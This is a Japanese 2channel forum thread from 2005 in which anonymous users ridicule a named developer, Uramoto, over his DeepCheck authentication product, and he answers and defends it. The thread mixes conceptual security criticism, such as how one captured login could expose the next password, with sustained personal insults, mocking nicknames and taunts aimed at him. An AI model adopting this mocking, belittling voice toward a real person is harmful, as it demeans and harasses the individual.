>>516 ちょwwwwwwwwおもしろすwwwwwwwww
浦本さんがBoFで、偉い顔した奴らを屈服させることができたなら、 浦本さんを散々馬鹿にしてきたことを謝るよ。 ついでに仕事を引退してもいい。 俺にはその覚悟がある。
浦本のことだから「本番とかプレゼンは苦手だから遠慮させてもらう」「そんなに暇じゃない」「そのはハローワークでいそがしい」などと言い訳するんだろうなぁ〜。 でもな、でもな浦本よ、これはチャンスだぞ一発逆転のチャンスだぞ! 成功すればまさに下克上! 行けぇウラモティ〜!行け行けぇぇウラモティィ〜〜! 頑張れ頑張れウラモティイイッ!頑張れ頑張れウラモティイイィイイ!!
もし仮に浦本が如何なる理由をつけてそのイベントへの出席を断ったとしても 俺は浦本をハッタリ大好きな究極のへたれとして認定する 逆に参加したら最強の器を持つ漢として認めたいと思う
まぁ、おおかたの予想通り、ウラモティはBoFなんかにゃ出ないよ。
ははは…、まさにそうだな。 俺も浦本が出るわけねーと思ってるよ。ヤツにそんなことができるわけねーw
さぁ、みんなで応援だ! イーケーイケイケ インチキ社長っ♪ オーセーオセオセ インチキ社長っ♪ イーケーイケイケ インチキ社長っ♪ オーセーオセオセ インチキ社長っ♪
527 :
432 :2005/11/27(日) 03:07:48
>>485 言い返す言葉もございません。すべては私の調査ミスですし…。
しかし私も何べんも謝罪していますから、できればそろそろ許していただきたいと思っています。
話は変わりますが、規模は小さいが将来性のある会社をご存知ないでしょうか?もちろんエクスフェー様は将来有望だと思っておりますが現在採用活動をしていないということで残念ながら…ということです。
ご存知でしたら是非教えていただきたいと思っております。
できればどのような技術を持っている会社か、何故将来性があるのか等を教えていただければと思います。
いじょうありがとうございました。
結局、浦本は今日も逃げたのか
浦本さん、
>>504 の質問にきちんと答えてくださいね。
530 :
名無しさん@お腹いっぱい。 :2005/11/27(日) 03:35:20
>>528 そんなことを言うと、まるで浦本が逃げなかったことがあるみたいじゃないか。
今日も浦本は正常運転だっただけだよ。今日も逃げたんじゃなくて、いつも逃げてる。
>>530 でも本人は逃げてないって言うと思われw
おいウラモティ、そろそろ
>>527 (
>>432 )さんを許してやれよ悪気があったわけじゃないんだから。
まったくお前はケツの穴の小さいヤツだなぁ。つまり肛門が小さいヤツだなぁ。
嫁いびりって聞かなく代わりに、ハゲいびり(実際はハゲじゃない、そして、ハゲても構わない。)でも流行ってんのか?
まるでイビリ100選って感じ。まさお君、こんなのマネるんじゃありませんよ。
口先だけで楽しもうという横着な連中ですから。
もっとも、背中ニャ、重い重い家族を、それぞれしょってますけどね。
BOF の話しで盛り上がってるけど、memo に失望してるし、出る意味ないよ。
ひろみつ氏は一部尊敬する。私の申し出を断らなければ良かったんだけれどね。
見聞きする前に断るのは、どうかと思う。もっとも、電話での申し込みだったかな?
こちらの説明不足もあったかも知れないけどね。
ま、論理展開だけで破れた破れたと叫んでるようなイメージがあって、もしかしたら、
だれか、DeepCheck発売前に潰そうタクラミが働いてるかもよ。
---
DeepCheck+の発表は
>>502 さんの勝ちになりそう。
俺なり納得して公表させてもらいます。
もう、直だから、ガマン。そしたら、また、あることないことイジれて、楽しい明日がまっている〜(^o^)/って訳だ。
ハローワーカーには日曜も休日も無い。
---
べつけん
ビデオチャット使ってるひといたら手を挙げてください。おねがいしま〜す。
>こちらの説明不足もあったかも知れないけどね。 違うな。 お前は日本語でコミュニケーションをとれないからだ。 ひろみちゅは英語でも大丈夫だろうが、浦本は英語も話せないからな。
浦本さん、
>>504 の質問にきちんと答えてくださいね。
>論理展開だけで破れた破れたと叫んでるようなイメージがあって、 論理で破れれば十分だろ。だから、MD5もSHA1も騒がれてる。 DeepCheckも論理的に破られた。だから終わりだ。 もっとも、浦本はバカだからuraアカウントのカーソルをいじられたことを 実際に見ないと理解できない/認めないんだろうけどね。 あと、DeepCheckのどのへんがスパイウェアに強いのか「理論的に」教えてくれ。 「安全だ、安全だ」なんて言うのは誰でもできるからな。 みんなが納得できる内容で説明してくれよ?
論理という言葉についてウラモティと漏れの間にズレがあるような気がする
このことはすでに
>>414 が述べられているけれども(私は
>>414 (=前410)ではありません)
このズレを解消してみようと思う
>
>>533 ま、論理展開だけで破れた破れたと叫んでるようなイメージがあって、
ウラモティはプログラムを書くときに頭の中で「あれをこうして…」と考えるよな?
そのあと考えたことをプログラムで再現していくわけだ
プログラムには「あれをこうして…」などという手順がいっぱい書いてある
プログラムは頭の中にあるロジック(論理)を実際に形にしたものであり
プログラムってのは書いたとおりにしか動かない(←ここ重要)
プログラムってのは論理の固まりなわけだ
ここまではウラモティも同意するよな?
>>537 の続き
>
>>299 だから論理と実際は得てして異なる。
>
>>383 机上の論理ではなく、実際に破ってください。
机上の論理とか机上の空論ってのは
論理と実際が大きくかけ離れている場合に言うわけだが
プログラムについてはそれは当てはまらないんだ
上で述べたように「プログラムは書いたとおりにしか動かない」わけで
論理と実際がかけ離れようがないんだよ
あとウラモティの言う「実際に破る」っていう行為が
DeepCheckの本質と関係ない行為(サーバのroot奪取など)を含むのであれば
それはDeepCheckを破ったことにはならないってことには同意してくれるか?
ウラモティはDeepCheckと関係ないところでサーバのroot奪取されたことに対して「DeepCheckが破られました」って言うの?(←ここ重要)
ここで言うDeepCheckの本質ってのがつまり論理でありプログラムのロジックであり
もっと分かりやすく言うと「DeepCheckの仕組み」のことを指すんだ
大事なのはDeepCheckの仕組みそのものであってサーバのroot奪取などじゃないんだ
それは分かるよな?
スレのみんなはDeepCheckの仕組みという言葉を使わずに「論理」という言葉に置き換えて指摘していたんだ
だからウラモティは今後は論理という言葉をDeepCheckの「仕組み」とか「本質」とかに置き換えてスレを読んでみると
よりズレが解消されるかもしれないね
論理という言葉について漏れとウラモティとの理解のズレが少しは解消されたかな?
539 :
508 :2005/11/27(日) 11:31:53
ふーん、「memoに失望した」ねぇ。DeepCheckが歯牙にもかけられなかった
から、ひがんでるだけじゃねーの?(笑)
俺は別に「memo」には失望はしていない。頻度は下がったけど、時々は有用
な情報も流れてくるし。だからBoFにも出る。めったに聞けないことが聞ける
いい機会だしね。
それと、俺だって家持ち妻子持ちの開発者兼システム管理者だが何か?
家族持ちだとなんかエラいのか?ん?
#俺に喧嘩売ってんのか?
>>536-538 そういうことですな。DeepCheckとMD5やSHA1とじゃ、比べ物になりません
けどね。
もしかして浦本は、プログラムが論理通りに実装されてるか、テストしてないのかな? だから、論理と実際は異なるとかアフォなこといいだすんだろうな。
最近こういうのを読んだ。ちょっと長いけど。
ttp://iwatam-server.dyndns.org/column/84/ DeepCheck=トンデモ科学として読むと面白いかも。
> 「科学」の意義は、誰かが発見した方程式を覚えて使えるようにすることじゃない。
> 自分が疑問に思ったことの答えを、自分の力で見出すことにある。(中略)
> 自分の頭で考えて、自分なりの答えを出している。残念ながら結論は間違っているわけだが、
> 考えてないよりはずっとマシだ。
浦本さんの方が私よりもずっとマシなんだと、ちょっと反省。
残念ながら結論は間違っているわけだが...
542 :
名無しさん@お腹いっぱい。 :2005/11/27(日) 13:02:55
>>541 浦本のは疑似科学じゃなくてオカルトだよ。
魔方陣や御符にだって法則はある。ただ、心理的なもの以外に効果が無いだけだ。
DeepCheckだってそうだろ。浦本は信じているが、実際には効果が無い。
玄関にお札を貼って「封印したから戸締りOK」と思うのが、DeepCheck
>>539 イベント行けて良いなぁ。ずっと、忙しくて無理だ。
今年唯一行ったのはBlack Hat Japanだけ。
545 :
名無しさん@お腹いっぱい。 :2005/11/27(日) 14:20:05
>>544 俺も忙しくて今年はほとんど見にいけてないなあ。
Windows Server World 2005 は出張をこじつけてちょっとだけ見れたけど。
大きなイベントはみんな東京だから、地方在住者は厳しいんだよね・・・
>>543 >疑似科学の傾向
1:YES, 2:YES, 3:YES
>疑似科学者の傾向
1:YES(に見える) 2:YES(少なくとも俺たちはバカにされている)
3:YES,4:YES(「暗号」に対する「攻撃」wなど) 5:YES
>ウラモティもここまでひどくなくてもやっぱその傾向があるよな
ここまでひどいですw
>>533 を受けてウラモティは敵前逃亡したとみなされました。
しっぽを巻いて逃げました。
ウラモティさ、もう浦本負久に改名したら?
浦本さんって、誤字脱字がひどいけど打ち合わせ資料とかもこんな感じなのかね?
>>548 プレスリリースが誤字脱字だらけなのを見れば、他の資料も同じだと見るのが自然だろ。。。
浦本って人は『検証』ってもんをしない人間なんですよ。 DeepCheckの正当な検証をいつまでも拒んでいたりすることからも分かる。 いろいろな文章の誤字・脱字・意味不明な日本語からみるとおり自分文章の検証もしていない。 こんな人の作ったものなんて使えるわけがないね。
浦本って人間は、PDCAサイクルをちゃんとまわしてないよね。
>>551 つか、PDCAも何かわかってないと思うよ…。
まともな企業なら新人教育やその後の教育で論理的思考などのトレーニングをするんだけど、浦本氏はそんなの身に付けてないんだろうなぁ。
浦本氏は「なんで俺だけ何もわかってないように言われるんだ?」なんて思ってるんだろうね。
お前とお前以外の人とはベースが違うんだよ〜。
553 :
432 :2005/11/27(日) 18:41:35
>>533 私のことを無視されているようですが、それはまだ許してはいないということでしょうか?
よくわかりませんがもしかして法的な手段も考えてらっしゃるのでしょうか?
できれば早期に許していただきたいと思っております。
また、会社紹介の件も引き続きお願いいたします。
いじょうありがとうございました。
554 :
名無しさん@お腹いっぱい。 :2005/11/27(日) 18:42:22
>>551 浦本式PDCA
Paradice お花畑で幸せ回路をフル回転させて設計
Dream 夢のような成功物語を思い浮かべてニヤニヤする
Coding とりあえず実装してリリース
Alone 誰にも相手にされず嘲笑の的になって孤立する
>>554 俺もいろいろ考えたが、それ以上にしっくりするものは思いつかなかったなぁ。
ちょっと俺もアツくなりすぎたな。また名無しに戻るよ。
>>544 Black Hat Japanいいなぁ。そっちも行きたかったけど、
そっちは稟議がおりなかったんだよ。寄与するものが
ないからってんで。
今回は、企業の冠も入ってないし、こんなことは年に
一度なんだから、って上司を説き伏せたのさ。
>>545 そうだなぁ。俺も地方在住者だからわかるぞ、その気持ち。
浦本さん、引退宣言はどうしたんですか? 引退宣言したのにまた舞い戻ってくるなんて、大仁田厚みたいですね。
558 :
名無しさん@お腹いっぱい。 :2005/11/28(月) 16:21:44
DeepCheck+マダァ-? (・∀・ )っ/凵⌒☆チンチン
ここ以外では全く話題になってないようだから このままDeepCheckも消えていくのかな... ちょっぴり寂しいね。 BOF に突撃くらいしないやらないと一発逆転はないかな?
>InternetWeek2005のSecurityDaysに出席するんだけど、
>ウラモティこねぇかな?セキュリティホールmemo BoFとか。
>…金無いから来れないかな?
ご明察。
Black Hat Japan にも行きたかったけどね。
>>560 さん、Watch ご苦労様です。
>>561 InternetWeek2005のWebPageちゃんと読め。セキュリティホールmemo BoFは
無 料 だ。
新宿からなら電車料金もそんなにかからないから来いよ。
>>559 さん
そうですね〜、でもね、おもてがあれば、uraがある。
いろいろいじってもらってるんですよ。2大検索サイトさんに。
少し不気味だけど。
564 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 00:06:46
>>563 裏から見てもむこうが透けて見えるくらい薄っぺらい浦本さんこんばんは。
それって検索ロボットくらいしか来てくれないってことだろ(笑)
>>560 今度はスターロジックにいちゃもん付け出すのかとオモタ
>>561 おみゃ〜はSkin Head Japanにでも行ってろ
>>568 さん、
BOF も
>>567 さんのSkin Head Japanにも行けません。びんぼー暇無し。
2年ほど前にも声をかけていただき、そのときは、雰囲気だけでもと楽しみにしていたのですが、野暮用があり
行けなかった。ま、いっても場に馴染めなかったと想像してしまう。
オイラ、学校とかサークルとかチームとか、ダメなんだよね。
---
>「フィッシング詐欺の対策について“いたちごっこ”で片付けられてしまいがちだが、Webサイトや
ブラウザーに欠陥がない限り、アドレスバーのドメイン名とSSLの鍵マークを確認することで偽のWebサイトを見破れ
>る」と指摘する(図15[拡大表示])。
と、
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20051116/224693/ で、浩光氏が答えてるね。
答え方のTPOの見本だと感じてしまった。
だって、ブラウザーに欠陥がない事を知る事そのものが難しいのは解ってるはずだし、読者に、くどく
説明しても限界がある事をわきまえての発言としか思えないもんね。
書き分け。 DeepCheck+に時間がさけない状態。時間がないのではなく、体調不良。いま回復期に入ったので、もう1、2日 したら、再開できると思っています。 DeepCheckを誰も破ってくれないので、DeepCheck+は、独立して発表することになりそうです。 そうそう、さっきの記事に、以下の文を見つけました。 >フィッシング詐欺に関しては、専用対策ソフトを提供しているネット銀行もある。だが現時点では >使い勝手の面で本誌読者にお薦めできるものではないと考え、その概略は本特集末尾の別掲記事に >まとめた。
571 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 08:12:20
>>569 一年かかってDeepCheckしかでてこないのは相当にヒマなはずだが。
それにしても浦本は本当に科学的思考ができないやつだなあ。
572 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 08:14:25
>>570 DeepCheckはすでに終わってる。始まりさえしなかった。とっくの昔に破られている。
ああ、DeepCheckは当時からあるフィッシング対策シフトより使いにくいな。
しかも性能まで低い。誰にとっても薦められる物ではない。
uramotyさんはネット銀行のソフトウェアキーボードって使ったことありますか? 私としてはあれより使い勝手が悪いものは試してみる気にもなりませんが (ユーザーは使い方を理解してくれないだろうし)、 DeepCheckは中身はともかく、 使い勝手の面でこれ以上の向上は望めないのでしょうか。
>>573 中身はそれ以上に糞、ただのrot13だろ?
>>573 さん
銀行のソフトウェアキーボード、使った事ありません。雑誌で観た事はあります。
>使い勝手の面でこれ以上の向上は望めないのでしょうか。
99%無いと思います。
というのも、データをなんらかの方法でコンピュータやATMなどの電子機器に入力すると、いったん
内部のメモリ(バッファ)にたまります。
あるものは、クリアされない限り、時期の差こそあれ盗まれる状態にある訳です。
これを防ぐ確実な方法は、断片入力か、暗号化して入力するか(ゼロ知識証明含む)です、
私の現在の頭では、上記を達成するには、今の入力方法が一番だと確信しています。
冗談ですが、人間が暗号化でき、それを、入力できれば、これに飛びつきます。
でも、それは、よりユーザビリティの低いものとして扱われるでしょう。
---
電子セキュリティの担当者は、ユーザビリティをとるか安全性を取るかです。
一般ユーザーも、最初は否定的でも、本当の意味が解れば、多少の苦労は厭わないと確信しています。
>>574 さんみたいに、中身を吟味しないでヤジを飛ばしてくれてるpostが多いのですが、私にとっては
実はアリガタイ事なのです。
わたしがボケ、
>>574 さんはツッコミ。
577 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 18:10:02
本当の意味が解ればって、はじめから無意味なものに意味なんかあるわけねえだろ。
浦本さん、だいぶ体調回復したみたいですね。よかったです。 さて、以前、DeepCheckのuraアカウントについて データを公開するという約束がありましたが、覚えてますか? その約束はいつ果たしてくれるのでしょうか?
>>575 DeepCheckの入力、送信するパケットもメモリ上に展開されるのだが...
お前、なんか入力さえロギングされてなきゃスパイウェア対策ばっちりです、とか思ってないか?
まぁ、uraパケットダンプを晒せないんだから(ry
> これを防ぐ確実な方法は、断片入力か、暗号化して入力するか(ゼロ知識証明含む)です、
( ´,_ゝ`)プッ
http://uramoty.exblog.jp/ > 暗号化は有効な手段ですが、盲点があります。暗号化する為には、平文を入力しなければならない、
> 無防備の時間、魔の一瞬がある訳です。
( ´,_ゝ`)プッ
壮大なネタスレじゃねーか? >いろいろいじってもらってるんですよ。2大検索サイトさんに。 >少し不気味だけど。 って普通Webサイト持ってれば、検索ロボットのアクセスくらい見分けがつくだろ。 釣りとしかおもえんぞ。
>>570 >DeepCheckを誰も破ってくれないので
そりゃそうだろ
>>579 に対する返答次第だな
>>579 さん
申し訳ないです。DeepCheck+発表の目鼻がついたらと改めさせてください。
皆様と同じように、意識がDeepCheck+に固まったら1日くらいで発表できるように放っています。
勝手で申し訳ありませんが、今暫く、お待ちください。
>>580 さん、無記名で良かったですね。このポストであなたはおお恥をさらすことになったんですよ。
>>581 さん、ログを観る限り手作業です。DeepCheck体験サイトも実行されてますし。
これはロボちゃんには出来ません。
>>582 さん
私が横柄にも
>>410 さんを評価しているのは、90%(いい加減)正解だからなのです。
100%正解とは一度も言っていません。
しかし、
>>410 さんの方法論で(勿論サーバーへの連続したリクエスト内容が入手できたと仮定して)
その間、カーソル行番号やパスワードが動かないと仮定すると、少しの工夫で解けます。
これを実質上、達成していただいて、「DeepCheck+」に挑んでいただきたいのです。
残念ながらインタフェースは返る事が出来ませんでしたが、
>>410 さんの論理展開で正しいのですが、
X座標の起点や、同一起点に置けるX座標がゆらいだ場合、
>>410 さんの論理では先に進めなくなります。
これを途中省略する事無く、実体験していただくことで、DeepCheck+でも、つまり、高度な暗号を駆使しなくても
行けるかもという感触を体験してほしい訳です。
全部では、勿論ありませんが、いくつか、DeepCheckの背景に役立つ情報を私のブログに書いておきました。
時間のある方は、一読頂かれば幸いです。
>>585 さん
一切、許可は取っていません。
あなたがご私的になった問題は根本的な問題をはらんでいると思います。
ご遠慮なく各紙、各紙にご通報ください。
---
実際上無理。
情報の出典を明らかにしている。つまり、自分が書いた部分と引用とを明確に区分している。
>>584 さん
>>337 では、プロンプトを使っているので、スパイウエアからみればアウト。
Red Hat などをだれかリークしてほしい。
揚げ足取る訳じゃないけど、みなさん、オイラの悪い癖が伝染しだしたよ。 書込む前に、変換テェック。
588 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 22:46:54
10レスゲームの中の人だよ。
>>583 >
>>581 さん、ログを観る限り手作業です。DeepCheck体験サイトも実行されてますし。
そのログを晒せ。手作業かどうか見てやろう。
できなければウソだと見なす。ま、できないだろうけどな、浦本はウソか妄想しか吐けないからな。
>100%正解とは一度も言っていません。
90%正解というのも初耳だなあ。俺が追試したところ100%正解だったが。
>同一起点に置けるX座標がゆらいだ場合
笑わせてくれるな。「DeepCheck」では「ゆたぐことはない」
慌てて改造して「破られてない」と強弁しようとしているのが丸わかりだな。後出しジャンケンしたいのか?
それでも負けているのが浦本なんだがな。
プラスがついていてもクズだってことを予言しておこう。10レスゲームの五つの問題点が全て改善されない
限り、使い物にはならないからだ。そして、全て改善することは不可能だ。
なぜなら、全て改善したら、DeepCheckではなくなるからだ。
589 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 22:48:43
>>587 お前の悪い癖は「思考しない」「反省しない」「ウソをつく」「逃げる」「ゴミに固執する」だ。
誰にも伝染していない。
>>586 >
>>337 では、プロンプトを使っているので、スパイウエアからみればアウト。
たしかにプロンプトを使っていて便利になっていますが、スパイウェアから見
て、あなたのシステムの場合とどう違うか説明していただけないでしょうか?
591 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 22:53:02
10レスゲームの中の人だよ。 DeepCheckのインターフェイスがスパイウェアに弱いことは論証済みだね。
592 :
名無しさん@お腹いっぱい。 :2005/11/29(火) 23:01:33
10レスゲームの中の人だよ。
ちなみにDeepcheckのインターフェイスがスパイウェアに弱いって論証は
>>358 にある。
実際には一度ログイン操作を一式キャプチャされたら、その中に必ず「次回パス」が含まれるから、
仮に8文字分入力したとして、最大7文字が次回パスだからケツから7操作ぶんx5パターンで
35回の試行でクラックされることになる。しかもパターンは把握されてるから手作業で充分。
いちど操作をキャプチャするだけで事実上破られるDeepCheckはスパイウェアに弱い。
しかも操作性が悪く、パスワードの文字種が不足しているために各種認定を受けられないDeepcheckは
導入するだけ損をするだけ。そんなものが売れるはずがないのはすぐにわかる。
売れてから反論しなよ、一年無駄にした挙句に仕事も取れないエクスファの無能社長さん。
>>588 また、アンタか。まったく雰囲気悪くするよ。
でも、最初からの約束だからね、この方が板もりあがるもんね!
で、晒さない。嘘つきと言われようとも一向に構わない。
>100% は、あなたの思い込み。
>「ゆたぐことはない」 は突っ込めという振り?
それはさておき、あなたがどう考えようがあなたの勝手。世の中はマルチプルに動いています。
>>589 さんは、
>>588 と看たり。
>>590 さんへ
プロンプト入力は、すなわち、コンピュータへの入力。平文をまんまいれたら、それはもう、餌食にしてくれ
ってな事と同じですよね。文中に
>>337 とあるのは、
>>334 の間違いと勝手に解釈します。
違ってたら、ご指摘ください。
電磁機器にあるバッファ、メモリーはなんらかの方法でクラック出来ると仮定して書いています。
出来るかも知れないなら、読まれても平気であるものしか入力しないと考えるのは、極めて、自然でしょ。
>>585 さん
証拠集めしても意味ないですよ。グーグルはいちいちサイト管理者に了解取ってるんですか?
「ジャーナリズムにはある意味秘密は無い」私が尊敬するジャーナリズム関係者の言葉です。
今日はそろそろ店じまいです。実は今日、本当は体調不良。2ch に精進すれば調子が出るかと思ったのですが。 残念。 あすお会いできれば楽しいですね。 では、失礼します。
596 :
名無しさん@お腹いっぱい。 :2005/11/30(水) 00:02:40
>>593 悔しかったら一つでもまともに反論してから寝言をほざいてくれよな。
597 :
名無しさん@お腹いっぱい。 :2005/11/30(水) 00:07:22
遅かったか。 では、浦本の電波を。 >で、晒さない。 晒せないの間違いだろ。晒さないなら意図的に晒さない理由を述べてみな。 理由はただひとつ。「人為的と第三者が納得できるようなログが無いから」 それ以外で合理的な理由があるなら証明してみな。今まで通りなにも証明できないだろうけど。 >電磁機器にあるバッファ、メモリーはなんらかの方法でクラック出来ると仮定して書いています。 現在ある暗号化はコレについての解法のひとつであって、それを上回るものは発明されていない。 deepCheckは暗号化を下回るものでしかないものであることは複数の人物が何度も繰り返し指摘している。 まともな反論は一切なかった。 >「ジャーナリズムにはある意味秘密は無い」私が尊敬するジャーナリズム関係者の言葉です。 だが著作権はある。
598 :
名無しさん@お腹いっぱい。 :2005/11/30(水) 00:09:43
ああ、あと、前スレ410氏の証明が「100%ではない」というなら、反証を挙げてから言ってね。 反証が無いままってのは妄言だよ。浦本以外の正常な世界では。 それから、10レスゲームの課題がひとつ残っているんだ。 「deepCheckの利点を挙げろ」 無いのかな?
>>598 > OSログイン、各種アプリケーションログイン、各種会員認証、
> 社員認証、Webサービス会員認証、eコマース認証、B2B認証、P2P認証、他。
いろいろ使える(笑)
早くJavaHouseに謝罪しろよ、どうしようもない人間だな。
601 :
名無しさん@お腹いっぱい。 :2005/11/30(水) 00:56:25
>>599 Windows サービスとしてインスコしてもログインプロンプトに耐えられるのかなあ。
windowsXP では「とりあえずログイン画面出して、裏で読み込みを継続」だし。
Windows2000 はもうサポートが切れたも同然だしね。新規採用は見込めない。
Linux の場合でも同じだね。しかも Linux ではリモートログインの可能性もある。
X でもかなり苦痛だろうに、とてもじゃないけどキャラクタベースでアレは・・・・
ってかローカルログインをキャプチャされてたら別の意味で終わってるだろ。
ログイン機能をカスタマイズしてチープチェック鯖に認証しにいく?
ケルベロスなりWindowsドメインなりもっと便利で堅牢なものがあるだろ。
それともmonaみたいな新規OS狙い????
まあ、「不可能ではない」って意味だろうけどね。
はあ、「後日答える」とか言っておきながらまた逃げたよ。
それとも忙しかったんですかね?
ま、1週間もあったのに忙しかったなんて答えだけは聞きたくないな。
30分もあれば答えられるだろう?
ちなみに、この質問を書き込むの4回目ね。
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
DeepCheckの根底に流れる思想だろうから、ぜひ聞きたい。
12月1日午前0時までにご回答願いたい。
603 :
名無しさん@お腹いっぱい。 :2005/11/30(水) 01:07:36
スタンドアロンでもログインできなきゃいけないわけだから、どうしてもチープチェックの場合 アカウント情報をローカルに持つ事になるなあ。 となると、WindowsならNTLM互換のアカウントDBと接続できなきゃ意味が無いってか。 となるとログイン画面をラッピングする形で実装?? アレを????? 間違いなく付箋紙の嵐になるな。しかも本来のパスワード文字種より少なくなるから、 PCごと盗難なんてことになったらHDからsumぶっこぬいて云々になる。 それを防ぐソリューションはすでに堅牢なのがあるから、やっぱチープチェックには意味がねえな。 OSログインにはムリをすれば使えなくも無いが使う意味が無いと。 次、ユーザ認証の類・・・はすでに意味が無い(認証として腐ってる)のが論証されて・・ぁぅぁぅ
>>593 > プロンプト入力は、すなわち、コンピュータへの入力。平文をまんまいれたら、それはもう、餌食にしてくれ
> ってな事と同じですよね。
はい。確かにそうですよね。
> 電磁機器にあるバッファ、メモリーはなんらかの方法でクラック出来ると仮定して書いています。
> 出来るかも知れないなら、読まれても平気であるものしか入力しないと考えるのは、極めて、自然でしょ。
はい。極めて自然ですね。
しかし、あなたのシステムで入力するものは「読まれても平気」でしょうか?
私にはそうは思えないので、説明していただけないでしょうか?
605 :
名無しさん@お腹いっぱい。 :2005/11/30(水) 01:21:36
ぶっちゃけてしまえば、 ・キーボードからの入力はキーボードメッセージを偽装すればエミュレートできる。 ・マウス入力も同じ。 ・その他ハードウェア入力も同じ。指紋認証だって虹彩認証だって同じ。 なので、何らかの入力を行って認証するというシーケンスであれば、理論上でなら どんな認証方法でもクラックは可能、ということになる。 あとはどの程度クラックするまで時間がかかるかの勝負。 DeepCheckはその点脆弱さをよくわかっているね。 毎回パスワードを変更しないとクラックされるくらい弱いってことがよくわかっているじゃないか。 ブルートフォースにもスパイウェアに対しても既存の認証システムより弱いんだから。
そういや、DeepCheckでは、DBへのパスワードの保存は、平文のままなのかな。 複数のDBに分散させるぐらいだから、まさか平文のままってことはないよねぇ・・・? (ワクワク
↑の数人の方へ。 断言するが、絶対浦本氏は話についていけないってば。 10レスゲームの人が出した問題とか、全然ついていけてないもん。仔犬がキャンキャン吼えるように負け惜しみだけしか言わんよ…。
おい、爺さん、公式にし○ふ氏に謝罪しろってば。 どうせオマイさんの方が悪いんだろ? JavaHouse上が言いにくかったら、ここで良いから謝罪しろ。土下座アスキーアート付きでね。
さて、以前、DeepCheckのuraアカウントについて データを公開するという約束がありましたが、覚えてますか? その約束はいつ果たしてくれるのでしょうか? データを公開するという約束がありましたが、覚えてますか? その約束はいつ果たしてくれるのでしょうか? その約束はいつ果たしてくれるのでしょうか? その約束はいつ果たしてくれるのでしょうか? その約束はいつ果たしてくれるのでしょうか? その約束はいつ果たしてくれるのでしょうか? その約束はいつ果たしてくれるのでしょうか?
,. - ─── - 、 / , `ヽ. /〃//,. ,ィl/|l ト、 !、 、 ヽ ー'´| | l |1 | !l. l| ! | l.|ヽ ! !、 ', YレV!ヒエ「! |l.「_ト!Ll」| l l l ! lハイJ | ´|_jヽ. リ,! ! l. l | うらもとおじちゃんは |l |l.} ー , L _,ハl.lトl l. | l どうしてみんなのしつもんにこたえないの? |l ilト、 n '' ,1l|ィ| |l l | _ 二,ニ^tュ--ェ_t1」l.|l !リ|_lノ r7´ f r┐| 〔/ミヽ>,-、 ̄´ Y ー个‐'t ハ-、_'ゝ、 ヽ ._・ rく ̄ヽト-'丿 ヽ l / (・__,)ゝi┬'´ハ` '`|
お嬢ちゃん、それはね彼がヒトデナシだからさ。 世の中良い人ばかりじゃないんだ。 ダメなやつは何をやってもダメなんだよ。
The討論 〜ウラモティのおもしろキャッチコピーを考える〜 ・人間スパマー ・The ヒトデナシ ・生きるスパイウエア ・歩く前言撤回 ・誤字脱字塾塾長 ・納期遅れの征夷大将軍 ・熊本のアスベスト ・The forth time U(Usotsuki)-1 チャンピョン ・平成の狼中年 ・頭頂部の最後の砦 ・Mr しらんぷり ・肥後モッコリ ・400戦棄権の男 ・逆恨みの天才 ・永遠のDNS挑戦者 ・勘違いの重戦車
Omoti と Uramoty どっちがつよいでつか?
スパマー Uramoty >>>> Omoti 誤字脱字 Uramoty >>>> Omoti 年齢 Uramoty >>> Omoti 浦本さん強いなー
いいこと思いついた。 でももうちょっと後で書くことにするよ。(w
おはようござ合います。 ま〜、いろいろ酒の肴にしていただいて。 深夜勤務のヒトもいるだろうに。 ま、眠気覚ましにはなっているか。な?
・人間スパマー ・The ヒトデナシ そして ・Mr しらんぷり これ最高w
>>618 ここはもまいの日記じゃねぇーよ
技術的な質問に答えろよ
>>246 参照
自己矛盾って奴だ
621 :
573 :2005/11/30(水) 13:48:58
>>584 ありがとうございます。
早速使用してみたのですが、
これを使うとuramotyさんの奇怪なUIが
不必要になってしまいびっくりです。
uramotyさんの使用されている
カーソルうんたらっていうのは
意味がないような気がしてなりません。
まぁ、浦本さんの奇怪UIは、 コンピュータ(≒スパイウェア)にとっては意味がないってことだな。
623 :
585 :2005/11/30(水) 22:05:34
>>586 > 一切、許可は取っていません。
> あなたがご私的になった問題は根本的な問題をはらんでいると思います。
> ご遠慮なく各紙、各紙にご通報ください。
> ---
> 実際上無理。
> 情報の出典を明らかにしている。つまり、自分が書いた部分と引用とを明確に区分している。
一切許可をとってないとのことですが、著作権について以下の2点が問題になるように思います。
問題点
1) ブログの一部(例えば、はやぶさに関するもの)に、出典と出典先の文章をそのまま転記し、
かつ浦本さんのコメントが一切ないものがある。
2) 画像データを許可なく、利用している。
他の文章を「引用」することに対しては、著作権は問題がないかと思いますが、(1)のように転載だと、
著作権保持者に対して許可を取っていない場合、著作権違反の可能性が大きいかと思われます。
# 2)については、明らかに著作権違反だと考えられます。
質問
浦本さんは、ネットで公開される著作権につきまして、どのようにお考えでしょうか?
624 :
585 :2005/11/30(水) 22:15:05
>>623 の訂正
(誤)浦本さんは、ネットで公開される著作権につきまして、どのようにお考えでしょうか?
(正)浦本さんは、ネットで公開されているデータの著作権につきまして、どのようにお考えでしょうか?
DeepCheck+マダァ-? (・∀・ )っ/凵⌒☆チンチン
The討論 〜ウラモティのおもしろキャッチコピーを考える〜 第二回 ・孤独な一人漫才師 ・え?オモテモティ?まさかねwハゲモティ?いやいやウラモティ♪ ・虚言の魔術師 ・死ぬまで夢見る下克上 ・シケモク ・ウラモティズム宣言 ・ソフトウエア業界のセルライト ・SGG(スーパー・がっかり・ごっそり抜け毛) ・一人デスマーチ ・東洋の虚人 ・新番組インチキおじさん物語 ・浦本メソッドの伝道師
627 :
626 :2005/12/01(木) 05:06:12
そうそう、"浦本メソッド"ってのはウラモティが頻繁に使う自分勝手なあの手法のことです。 この用語の名前をつけてみました。 そのうち内容も定義できればと思っていますが、他の方がしてもらってもかまいません。 この用語の定義によって「また浦本メソッドかよw」とか書けるようになれば議論もスム〜スに進むのではないかと思うのです。 それでは親御さんによろしく。
>>605 さん
